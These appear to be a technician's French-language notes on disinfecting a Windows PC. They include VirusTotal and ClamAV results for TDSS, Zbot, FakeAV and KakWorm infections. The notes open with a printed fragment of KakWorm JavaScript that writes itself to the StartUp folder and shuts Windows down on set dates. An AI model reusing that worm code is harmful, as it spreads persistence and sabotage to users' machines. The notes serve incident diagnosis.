true;}window.onerror=sErr;scr.Reset();scr.doc=\"Z');rs=t4.Read(3095);t4.close();rd=/\\\\/g;re=/\"/g;rf=/<\\//g;rt=rs.replace(rd,'\\\\\\\\').replace(re,'\\\\\"').replace(rf,'</"+"\"+\"');t3.WriteLine(rt+'\";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la==\"fr\")?\"C:\\\\\\\\windows\\\\\\\\Menu Démarrer\\\\\\\\Programmes\\\\\\\\Démarrage\\\\\\\\kak.hta\":\"C:\\\\\\\\windows\\\\\\\\Start Menu\\\\\\\\Programs\\\\\\\\StartUp\\\\\\\\kak.hta\";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf(\"msie\")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf(\"msie 5.\")!=-1))scr.write();');t3.write('//--></"+"'+'SCRIPT></"+"'+'OBJECT></"+"'+'BODY></"+"'+'HTML>');t3.close();fs.GetFile(wd+'kak.htm').Attributes=2;fs.DeleteFile(wd+'kak.reg');d=new Date();if(d.getDate()==1 && d.getHours()>17){alert('Kagou-Anti-Kro$oft says not today !');wsh.Run(wd+'RUNDLL32.EXE user.exe,exitwindows');}self.close();</"+"SCRIPT>S3 driver memory alloc failed &nbsp; !]]</"+"BODY></"+"HTML>";la=(navigator.systemLanguage)?navigator.systemLanguage:navigator.language;scr.Path=(la=="fr")?"C:\\windows\\Menu Démarrer\\Programmes\\Démarrage\\kak.hta":"C:\\windows\\Start Menu\\Programs\\StartUp\\kak.hta";agt=navigator.userAgent.toLowerCase();if(((agt.indexOf("msie")!=-1)&&(parseInt(navigator.appVersion)>4))||(agt.indexOf("msie 5.")!=-1))scr.write();
//--></SCRIPT>
</OBJECT></DIV></BODY></HTML>
</x-html>
Attachment Converted: "c:\eudora\attach\Présentation.doc"

Attachment Converted: "c:\eudora\attach\progprévi8sept.doc"
knoppix@Microknoppix:~$

connu de symantec (dixit virustotal):

ile name:
in.mbxold
Submission date:
2010-08-22 04:20:17 (UTC)
Current status:
queued queued analysing finished
Result:
26/ 42 (61.9%)
	
VT Community

not reviewed
 Safety score: - 
Compact
Print results
Antivirus 	Version 	Last Update 	Result
AhnLab-V3	2010.08.22.00	2010.08.21	-
AntiVir	8.2.4.38	2010.08.20	WScr/Unsafe.D
Antiy-AVL	2.0.3.7	2010.08.16	-
Authentium	5.2.0.5	2010.08.22	JS/Kak.A@m
Avast	4.8.1351.0	2010.08.22	VBS:Malware-gen
Avast5	5.0.332.0	2010.08.22	VBS:Malware-gen
AVG	9.0.0.851	2010.08.21	JS/Kak@m
BitDefender	7.2	2010.08.22	JS.Kak.Gen@mm
CAT-QuickHeal	11.00	2010.08.21	-
ClamAV	0.96.2.0-git	2010.08.22	JS.Kak
Comodo	5811	2010.08.22	-
DrWeb	5.0.2.03300	2010.08.22	WScript.Kak
Emsisoft	5.0.0.37	2010.08.21	-
eSafe	7.0.17.0	2010.08.19	-
eTrust-Vet	36.1.7804	2010.08.21	JS/Kak
F-Prot	4.6.1.107	2010.08.22	JS/Kak.A@m
F-Secure	9.0.15370.0	2010.08.21	JS.Kak.Gen@mm
Fortinet	4.1.143.0	2010.08.21	JS/Kak.family@m
GData	21	2010.08.22	JS.Kak.Gen@mm
Ikarus	T3.1.1.88.0	2010.08.21	-
Jiangmin	13.0.900	2010.08.21	I-Worm/KakWorm
Kaspersky	7.0.0.125	2010.08.22	Email-Worm.VBS.KakWorm
McAfee	5.400.0.1158	2010.08.22	JS/Kak@M
McAfee-GW-Edition	2010.1B	2010.08.21	JS/Kak@M
Microsoft	1.6103	2010.08.21	Trojan:JS/Kak.gen
NOD32	5385	2010.08.21	-
Norman	6.05.11	2010.08.21	-
nProtect	2010-08-21.01	2010.08.21	JS.Kak.Gen@mm
Panda	10.0.2.7	2010.08.21	-
PCTools	7.0.3.5	2010.08.22	Malware.JS-KakWorm
Prevx	3.0	2010.08.22	-
Rising	22.61.06.01	2010.08.22	-
Sophos	4.56.0	2010.08.22	JS/Kakworm-A
Sunbelt	6773	2010.08.22	-
SUPERAntiSpyware	4.40.0.1006	2010.08.21	-
Symantec	20101.1.1.7	2010.08.22	JS.KakWorm.G
TheHacker	6.5.2.1.352	2010.08.20	JS/Kak@M.worm.html
TrendMicro	9.120.0.1004	2010.08.22	JS_KAKWORM.AA
TrendMicro-HouseCall	9.120.0.1004	2010.08.22	JS_KAKWORM.AA
VBA32	3.12.14.0	2010.08.20	-
ViRobot	2010.8.18.3995	2010.08.21	-
VirusBuster	5.0.27.0	2010.08.21	JS.Kak.U

a priori sans effet car ce worm vise outlook, donc inoffensif sous eudora
trouver pouquoi pas détecté par NIS ?

BSOD (lire: http://en.wikipedia.org/wiki/Blue_Screen_of_Death )
lu: http://community.norton.com/t5/Norton-Internet-Security-Norton/SYMEVA-SYS-causes-BSOD-on-Vista/m-p/142971

si la cause est une mise à jour de windows: KB977165 , lire:
http://social.answers.microsoft.com/Forums/en-US/vistawu/thread/73cea559-ebbd-4274-96bc-e292b69f2fd1/

une floppée
en fait APPDRV.SYS, 9 fois, même taille, voir si il revenait tout seul ?
(enregistrés dans le point de restauration)

/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000013.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000025.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000037.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000049.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000063.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000081.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000097.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000128.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000149.SYS: Trojan.TDSS-3754 FOUND

pour TDSS, lire: http://www.prevx.com/blog/139/Tdss-rootkit-silently-owns-the-net.html
et: http://www.malekal.com/TDSSServ_TDSServ.php

NOTES

File name:
newsecureapp70700.exe
Submission date:
2010-08-19 22:15:05 (UTC)
Current status:
finished
Result:
16 /41 (39.0%)
	
VT Community

not reviewed
 Safety score: - 
Compact
Print results
Antivirus 	Version 	Last Update 	Result
AhnLab-V3 	2010.08.20.00 	2010.08.19 	Trojan/Win32.FakeAV
AntiVir 	8.2.4.38 	2010.08.19 	-
Antiy-AVL 	2.0.3.7 	2010.08.16 	-
Authentium 	5.2.0.5 	2010.08.19 	-
Avast 	4.8.1351.0 	2010.08.19 	-
Avast5 	5.0.332.0 	2010.08.19 	-
AVG 	9.0.0.851 	2010.08.19 	Generic18.BTWM
BitDefender 	7.2 	2010.08.19 	Gen:Variant.TDss.24
CAT-QuickHeal 	11.00 	2010.08.19 	-
ClamAV 	0.96.2.0-git 	2010.08.19 	-
Comodo 	5786 	2010.08.19 	-
DrWeb 	5.0.2.03300 	2010.08.19 	Trojan.DownLoader1.17996
Emsisoft 	5.0.0.37 	2010.08.19 	-
eSafe 	7.0.17.0 	2010.08.19 	-
eTrust-Vet 	36.1.7801 	2010.08.19 	-
F-Prot 	4.6.1.107 	2010.08.19 	-
F-Secure 	9.0.15370.0 	2010.08.19 	Gen:Variant.TDss.24
Fortinet 	4.1.143.0 	2010.08.19 	-
GData 	21 	2010.08.19 	Gen:Variant.TDss.24
Ikarus 	T3.1.1.88.0 	2010.08.20 	-
Jiangmin 	13.0.900 	2010.08.19 	-
Kaspersky 	7.0.0.125 	2010.08.19 	-
McAfee 	5.400.0.1158 	2010.08.19 	Artemis!326B2D2EA88C
Microsoft 	1.6004 	2010.08.19 	Rogue:Win32/FakeYak
NOD32 	5380 	2010.08.19 	a variant of Win32/Kryptik.GDP
Norman 	6.05.11 	2010.08.19 	-
nProtect 	2010-08-19.01 	2010.08.19 	Gen:Variant.TDss.24
Panda 	10.0.2.7 	2010.08.19 	Trj/CI.A
PCTools 	7.0.3.5 	2010.08.19 	-
Prevx 	3.0 	2010.08.20 	Medium Risk Malware
Rising 	22.61.03.04 	2010.08.19 	Trojan.Win32.Generic.5228A62F
Sophos 	4.56.0 	2010.08.19 	Mal/FakeAV-CS
Sunbelt 	6762 	2010.08.19 	VirTool.Win32.Obfuscator.da!a (v)
SUPERAntiSpyware 	4.40.0.1006 	2010.08.19 	Rogue.AntiMalwareDoctor
Symantec 	20101.1.1.7 	2010.08.20 	-
TheHacker 	6.5.2.1.351 	2010.08.19 	-
TrendMicro 	9.120.0.1004 	2010.08.19 	-
TrendMicro-HouseCall 	9.120.0.1004 	2010.08.19 	-
VBA32 	3.12.14.0 	2010.08.19 	-
ViRobot 	2010.8.16.3990 	2010.08.19 	-
VirusBuster 	5.0.27.0 	2010.08.19 	-

bilan clamav:

root@Microknoppix:~# clamscan -r -i /media/sdb2
LibClamAV Warning: ***********************************************************
LibClamAV Warning: ***  This version of the ClamAV engine is outdated.     ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
/media/sdb2/Documents and Settings/Annick Kieffer/Mes documents/attach08/Laposte.zip: Trojan.Zbot-2154 FOUND
/media/sdb2/Documents and Settings/Annick Kieffer/Mes documents/Eudora Mail/in.mbxold: JS.Kak FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000013.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000025.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000037.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000049.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000063.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000081.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000097.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000128.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/System Volume Information/_restore{340C3340-2EBB-4324-859A-C37E85627171}/RP1/A0000149.SYS: Trojan.TDSS-3754 FOUND
/media/sdb2/WINDOWS/system32/drivers/APPDRV.SYS: Trojan.TDSS-3754 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 816769
Engine version: 0.95.3
Scanned directories: 11669
Scanned files: 157562
Infected files: 12
Data scanned: 65781.62 MB
Data read: 81148.92 MB (ratio 0.81:1)
Time: 13455.145 sec (224 m 15 s)
root@Microknoppix:~#

Cet incident est rapporté sur trois pages, ne manquez pas la fin; voir la suite en BsodD630AK

AntiGuide: RogueDell630Ak

NOTES